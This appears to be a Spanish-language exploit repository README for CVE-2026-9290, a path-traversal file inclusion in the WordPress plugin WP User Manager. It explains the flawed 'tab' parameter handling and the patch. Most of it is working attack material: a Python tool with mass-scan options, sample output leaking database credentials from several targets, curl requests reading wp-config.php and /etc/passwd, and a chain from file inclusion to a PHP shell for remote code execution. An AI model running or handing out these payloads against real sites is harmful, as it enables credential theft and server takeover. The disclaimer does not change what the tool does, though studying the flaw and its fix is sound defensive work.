
Inclusión de archivos locales sin autenticación en WP User Manager <= 2.9.17 mediante path traversal en el parámetro tab (CVSS 7.5)
CVE-2026-9290 es una vulnerabilidad de Inclusión Local de Archivos (LFI) sin autenticación, de severidad alta (CVSS 7.5), en el plugin de WordPress WP User Manager – User Profile Builder & Membership (≤ 2.9.17).
La función wpum_get_active_profile_tab() pasa el parámetro de consulta tab directamente al cargador de plantillas de Gamajo sin validación de lista blanca. Las secuencias de path traversal en el valor de tab permiten a atacantes no autenticados incluir archivos arbitrarios del servidor mediante el include() de PHP.
| Versión de WP User Manager | Estado |
|---|---|
| ≤ 2.9.17 | Vulnerable |
| ≥ 2.9.18 | Corregida |
En includes/functions.php, la función wpum_get_active_profile_tab() toma el parámetro de consulta tab sin validación de lista blanca:
// Vulnerable: no whitelist check on $tab value
$tab = isset($_GET['tab']) ? sanitize_text_field($_GET['tab']) : 'profile';
wpum_get_active_profile_tab($tab);
El valor se pasa a Gamajo_Template_Loader::get_template_part(), que resuelve e incluye el archivo de plantilla:
// class-gamajo-template-loader.php line 226
include($template_path . $tab . '.php');
sanitize_text_field() NO elimina las secuencias de path traversal. ../../../wp-config pasa sin filtrarse.
GET /profile/?tab=../../../wp-config
→ wpum_get_active_profile_tab('../../../wp-config')
→ Gamajo_Template_Loader::include('../../../wp-config.php')
→ wp-config.php included → DB credentials exposed
El PR #445 añade validación de lista blanca:
// Patched: check against registered tabs
if (!array_key_exists($tab, $registered_tabs)) {
$tab = 'profile'; // fallback to default
}
git clone https://github.com/shinthink/CVE-2026-9290.git
cd CVE-2026-9290
pip install -r requirements.txt
# Single target — LFI probe
python cve_2026_9290.py -t target.com
# Mass scan
python cve_2026_9290.py -f targets.txt -v
# Read specific file via LFI
python cve_2026_9290.py -t target.com --read "../../../wp-config.php"
# Save results
python cve_2026_9290.py -f targets.txt -o lfi.txt
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--read PATH Read a specific file via LFI
-o, --output Save results to file
--threads Workers (default: 25)
-v, --verbose Show detailed output
$ python cve_2026_9290.py -t target.com -v
CVE-2026-9290 — WP User Manager LFI → RCE Exploit
CVSS 7.5 | Pre-Auth | Path Traversal via 'tab' Parameter
[+] WP User Manager detected
[+] Profile page: /profile/
[+] LFI confirmed: wp-config.php (DB credentials)
[+] Content preview: define('DB_NAME', 'wordpress_db'); define('DB_USER', 'admin');
Host : target.com
WPUM : YES
LFI : YES
File : wp-config.php (DB credentials)
Time : 3.2s
[LFI] target-1.com 3.2s wp-config.php (DB credentials)
define('DB_NAME', 'wp_db'); define('DB_USER', 'root');
[LFI] target-2.com 4.1s wp-config.php (DB credentials)
define('DB_NAME', 'site_db'); define('DB_USER', 'admin');
[200/5458] 3% | WPUM:12 LFI:5 | current-target.com
Paso 1 — Detectar WP User Manager
curl -sk 'https://target.com/wp-content/plugins/wp-user-manager/readme.txt' | head -3
Paso 2 — Encontrar la página de perfil
curl -sk 'https://target.com/' | grep -oP 'href="[^"]*(?:profile|account|dashboard)[^"]*"'
Paso 3 — LFI a través del parámetro tab
# Read wp-config.php
curl -sk 'https://target.com/profile/?tab=../../../wp-config'
# Read /etc/passwd
curl -sk 'https://target.com/profile/?tab=../../../../../../../etc/passwd'
# RCE — include uploaded PHP shell
curl -sk 'https://target.com/profile/?tab=../../../wp-content/uploads/2026/07/shell'
1. LFI → read wp-config.php → get DB credentials
2. Upload PHP shell via another plugin/media endpoint
3. LFI → include uploaded shell → RCE
SOLO CON FINES EDUCATIVOS Y DE PRUEBAS AUTORIZADAS.
Este software está destinado a profesionales de la seguridad que realizan pruebas de penetración autorizadas, organizaciones que auditan su propia infraestructura e investigadores que estudian la explotación de vulnerabilidades.
El acceso no autorizado a sistemas informáticos es ilegal y puede violar:
- Estados Unidos: Computer Fraud and Abuse Act (18 U.S.C. 1030)
- Indonesia: UU ITE Pasal 30 & 46
- Unión Europea: Directiva 2013/40/UE
- Reino Unido: Computer Misuse Act 1990
Los autores no asumen ninguna responsabilidad por el mal uso.
Este proyecto no está afiliado con WP User Manager ni Carbon Fields.
| Archivo | Línea | Función |
|---|
includes/functions.php | #L955 | wpum_get_active_profile_tab() — sin lista blanca |
templates/profile.php | #L52 | Alcance de la plantilla de perfil |
class-gamajo-template-loader.php | #L226 | include() sin sanitizar |
| Recurso |
|---|
| Enlace |
|---|
| Aviso de GitHub | GHSA-83v9-496w-54wx |
| Aviso de Wordfence | wordfence.com |
| PR del parche | GitHub #445 |
| Análisis de IONIX | ionix.io |